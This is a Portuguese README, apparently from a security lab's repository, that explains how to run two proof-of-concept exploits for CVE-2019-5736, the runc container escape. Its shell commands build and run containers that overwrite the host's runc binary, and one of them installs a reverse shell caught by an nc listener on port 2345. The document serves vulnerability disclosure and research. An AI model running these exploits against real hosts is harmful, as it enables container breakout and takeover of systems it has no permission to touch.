
PoCs do CVE-2019-5736
Dois PoCs para CVE-2019-5736. Consulte Twistlock Labs para uma explicação sobre CVE-2019-5736 e os PoCs.
O PoC de imagem maliciosa é fortemente baseado no PoC do q3k, portanto, todo o crédito vai para ele.
Observe que executar os PoCs sobrescreverá o binário runc no host. É recomendado que você crie uma cópia do seu binário runc (normalmente em /usr/sbin/runc) antes de executar um dos PoCs.
Clone o repositório:
$ git clone https://github.com/twistlock/RunC-CVE-2019-5736
Sobrescreve o runc com um programa simples que imprime uma string.
Executando o PoC exec:
$ cd RunC-CVE-2019-5736
$ docker build -t cve-2019-5736:exec_POC ./exec_POC
$ docker run -d --rm --name poc_ctr cve-2019-5736:exec_POC
$ docker exec poc_ctr bash
Sobrescreve o runc com um simples script bash de reverse shell que se conecta a localhost:2345.
Escute o reverse shell:
$ nc -nvlp 2345
Em um shell diferente, execute o PoC de imagem maliciosa:
$ cd RunC-CVE-2019-5736
$ docker build -t cve-2019-5736:malicious_image_POC ./malicious_image_POC
$ docker run --rm cve-2019-5736:malicious_image_POC